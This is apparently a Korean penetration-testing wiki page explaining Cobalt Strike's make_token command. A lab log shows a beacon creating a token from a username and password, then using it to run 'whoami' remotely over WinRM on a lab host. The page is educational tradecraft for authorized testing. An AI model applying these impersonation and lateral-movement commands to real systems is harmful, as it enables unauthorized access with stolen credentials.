Make Token
코발트 스트라이크에서 사용 가능한 make_token 명령은 사용자가 프로세스를 실행 중인 경우가 아니라도 해당 사용자의 계정 정보(아이디/패스워드)를 알고 있다면 토큰을 생성하여 가장할 수 있는 기능입니다.
# 사용자 계정 정보를 통한 토큰 생성
beacon> make_token <NetBIOS\USER PASS>이렇게 계정 정보를 통한 토큰 생성은 LogonUserA API를 호출하며 작동하는데, 토큰을 탈취하는 것과 다르게 이렇게 생성한 토큰은 기본적으로 기존 세션의 자격 증명을 대체하지 않습니다. 즉 원격 리소스에 접근하려는 것을 명시하지 않는 이상 생성한 토큰의 주체를 가장하지 않습니다.
Practice
# 사용자 계정 정보를 통한 토큰 생성
[05/04 14:20:58] beacon> make_token DEV\pentesting Password123!
[05/04 14:20:58] [*] Tasked beacon to create a token for DEV\pentesting
[05/04 14:20:59] [+] host called home, sent: 35 bytes
[05/04 14:20:59] [+] Impersonated DEV\pentesting (netonly)
# 토큰을 통한 원격 명령 실행
[05/04 14:21:44] beacon> remote-exec winrm web.dev.pentesting.wiki whoami
[05/04 14:21:44] [*] Tasked beacon to run 'whoami' on web.dev.pentesting.wiki via WinRM
[05/04 14:21:44] [+] host called home, sent: 263 bytes
[05/04 14:21:53] [+] received output:
#< CLIXML
dev\pentesting
Last updated
Was this helpful?